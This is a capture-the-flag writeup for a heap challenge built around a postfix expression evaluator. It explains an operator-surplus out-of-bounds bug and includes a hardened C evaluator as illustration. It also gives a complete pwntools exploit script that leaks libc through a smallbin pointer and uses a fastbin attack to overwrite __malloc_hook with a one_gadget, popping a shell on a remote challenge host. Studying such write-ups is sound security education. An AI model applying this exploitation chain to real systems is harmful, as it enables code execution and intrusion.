[Share] Challenge 6 (兵刃相向) writeup
2020-11-29 22:08
Approach
The program converts an infix expression to postfix and evaluates it. The checks in parse_infix_expression and process_infix_token are fairly strict, so the attack surface is concentrated in evaluate_postfix_expression. When the program obtains a heap chunk it does not zero the chunk's previous contents, so we can allocate two chunks A and B, set B's name to an operator, let A and B consolidate, and then allocate a slightly larger chunk so that the postfix buffer runs straight into B's old name. The result is a postfix token stream with more operators than operands.
With surplus operators, that evaluation code gives out-of-bounds access to g_ctx.g_symbol_ptrs. Going out of bounds upward and adding to or subtracting from the chunk addresses stored in g_ctx.g_symbol_ptrs is enough to do a great deal.
Once the chunk addresses in g_ctx.g_symbol_ptrs can be changed, pval becomes controllable. Use pval to write a multiplication operator, then use the multiplication operator's out-of-bounds access to zero g_ctx.g_broken, leak a bin address, and build a fastbin attack that writes a one_gadget into malloc_hook to get a shell.
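The root cause above is a postfix evaluator that pops operands without checking how many are actually on the stack, so a stream with more operators than operands walks below the start of the symbol array. The hardened evaluator below is an added illustration written for this writeup, not the challenge's code; the context type eval_ctx, the stack size and the function names are assumptions, and it shows the bounds checks the challenge binary lacked.

```c
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#define MAX_SYMBOLS 32
/* Hypothetical evaluation context, not the challenge's g_ctx: a fixed-size
 * operand stack whose depth counter is checked on every push and pop. */
typedef struct { long stack[MAX_SYMBOLS]; int sp; } eval_ctx;

static int push_operand(eval_ctx *c, long v) {
    if (c->sp >= MAX_SYMBOLS) return -1;   /* never write past the array */
    c->stack[c->sp++] = v;
    return 0;
}

static int pop_operand(eval_ctx *c, long *out) {
    if (c->sp <= 0) return -1;             /* never read below index 0 */
    *out = c->stack[--c->sp];
    return 0;
}

/* Evaluates a space-separated postfix expression of decimal integers and the
 * operators + - * /. Returns 0 and stores the value in *result, or -1 for
 * malformed input: an operator without two operands (the "more operators
 * than operands" case), leftover operands, division by zero, a bad token. */
int evaluate_postfix_checked(const char *expr, long *result) {
    eval_ctx c = { .sp = 0 };
    char buf[256];
    if (strlen(expr) >= sizeof buf) return -1;
    strcpy(buf, expr);
    for (char *tok = strtok(buf, " "); tok; tok = strtok(NULL, " ")) {
        if (strchr("+-*/", tok[0]) && tok[1] == '\0') {
            long a, b;
            if (pop_operand(&c, &b) || pop_operand(&c, &a)) return -1;
            if (tok[0] == '/' && b == 0) return -1;
            long v = tok[0] == '+' ? a + b : tok[0] == '-' ? a - b
                   : tok[0] == '*' ? a * b : a / b;
            if (push_operand(&c, v)) return -1;
        } else {
            char *end;
            long v = strtol(tok, &end, 10);
            if (end == tok || *end != '\0' || push_operand(&c, v)) return -1;
        }
    }
    if (c.sp != 1) return -1;              /* exactly one value must remain */
    *result = c.stack[0];
    return 0;
}

/* The value, or LONG_MIN when the expression is rejected. */
long postfix_value(const char *expr) {
    long r;
    return evaluate_postfix_checked(expr, &r) == 0 ? r : LONG_MIN;
}
```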
The script is badly written and has a lot of room for improvement, but it worked, so I couldn't be bothered to clean it up.
The exploit is as follows:
```python
from pwn import *

context.log_level = "debug"
local = False
if local:
    p = process("./ee")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    one_gadget = 0xf0364
    smallbin_offset = 0x7ffff7dd1b88 - 0x7ffff7a0d000
else:
    p = remote("121.36.145.157", "10000")
    libc = ELF("./x64_libc.so.6")
    one_gadget = 0xf02a4
    smallbin_offset = 104 + 0x3C4B20


def Gdb():
    gdb.attach(p, "b *0x555555554000+0x22C3\ndirectory ./srcs/\n")  # 0x1bb7


# Menu wrappers: 1 = create, 2 = delete, 3 = re-evaluate, 4 = show
def create(name, express):
    p.sendlineafter(": ", str(1))
    p.sendafter(": ", name)
    p.sendafter(": ", express)


def show(name):
    p.sendlineafter(": ", str(4))
    p.sendafter(": ", name)


def delete(name):
    p.sendlineafter(": ", str(2))
    p.sendafter(": ", name)


def revalute(name):
    p.sendlineafter(": ", str(3))
    p.sendafter(": ", name)


def getSize(size):
    return (size + 27 + 0x10)


# Chunk A ("aaa"), chunk B (name is the operator "--") and chunk C; free A and B so
# they consolidate, then reallocate a larger chunk whose postfix buffer lands on
# B's old, un-zeroed name, leaving more operators than operands.
create("aaa\n", ("00000000000000*" * 6)[:-1])  # 0 used
create("-" * 2, ("00000000000000*" * 6)[:-1])  # 1 used
create("ccc\n", ("00000000000000*" * 6)[:-1])  # 2 used
delete("aaa\n")  # 0 free
delete("-" * 2)  # 1 free
create("aaa\n", ("00000000001-" + "000000000000-" * 7)[:-1] + "00")  # 0 used

length = "qwertyuiopsdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
for i in range(21 - 3):
    create(length[i] * 2, "1+1")
create("*" * 18, "10000 * 347063282342678 + 7882")
revalute("aaa\n")
revalute("\n")
for i in range(26):
    revalute("aaa\n")
for i in range(21 - 3):
    delete(length[i] * 2)
revalute("\n")

# Repeat the consolidation trick to get the operator surplus back.
create("aaa\n", ("00000000000000*" * 6)[:-1])  # 0 used
create("-" * 2, ("00000000000000*" * 6)[:-1])  # 1 used
create("ccc\n", ("00000000000000*" * 6)[:-1])  # 2 used
delete("aaa\n")  # 0 free
delete("-" * 2)  # 1 free
create("aaa\n", ("00000000001-" + "000000000000-" * 7)[:-1] + "00")
# create("zzz\n", ("00000000008-" + "000000000000-" * 5)[:-1] + "00")  # fastbin attack
# create("uuu\n", ("00000000008-" + "000000000000-" * 5)[:-1] + "00")
# create("kkk\n", ("00000000008-" + "000000000000-" * 5)[:-1] + "00")

# Each re-evaluation shifts a g_symbol_ptrs entry by one; walk it to the bin
# pointer, then leak it via show and derive the libc base.
offset = (0x00005555557584a5 - 0x5555557580fd)
for i in range(offset):
    revalute("aaa\n")
show("1 +00000000!\n")
p.recvuntil("[*]value : ")
smallbin = int(p.recvline()[:-1])
# Gdb()
log.success("smallbin ==> " + hex(smallbin))
libc.address = smallbin - smallbin_offset

# Walk the pointer back, then set up the fastbin attack chunks.
offset = (0x5555557580fd - 0x5555557580b0)
for i in range(offset):
    revalute("aaa\n")
delete("\n")
for i in range(21 - 6):
    create(length[i] * 2, "1+1")
create("zzz\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")  # fastbin attack
create("uuu\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("kkk\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("ttt\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
offset = (0x0000555555758730 - 0x00005555557586c0)
for i in range(offset):
    revalute("aaa\n")
delete("kkk\n")
delete("uuu\n")
delete("\n")
# Gdb()
delete("aaa\n")
delete("qq\n")
delete("rr\n")
delete("uu\n")
# Fastbin fd now points near __malloc_hook; the third allocation lands there.
create(p64(libc.sym['__malloc_hook'] - 0x23), ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("deadC0de1", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("deadC0de2", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
one_gadget = libc.address + one_gadget
# Integer division (the original used "/" under Python 2); the expression
# below multiplies the quarter value back by 4 when it is evaluated.
one_gadget = one_gadget // 4
create("a" * 0x12, "{0} * 4 {1}".format(one_gadget, "-00000000" * 4))
# Gdb()
create("getshell", "1-1")  # triggers malloc -> __malloc_hook -> one_gadget
p.interactive()
```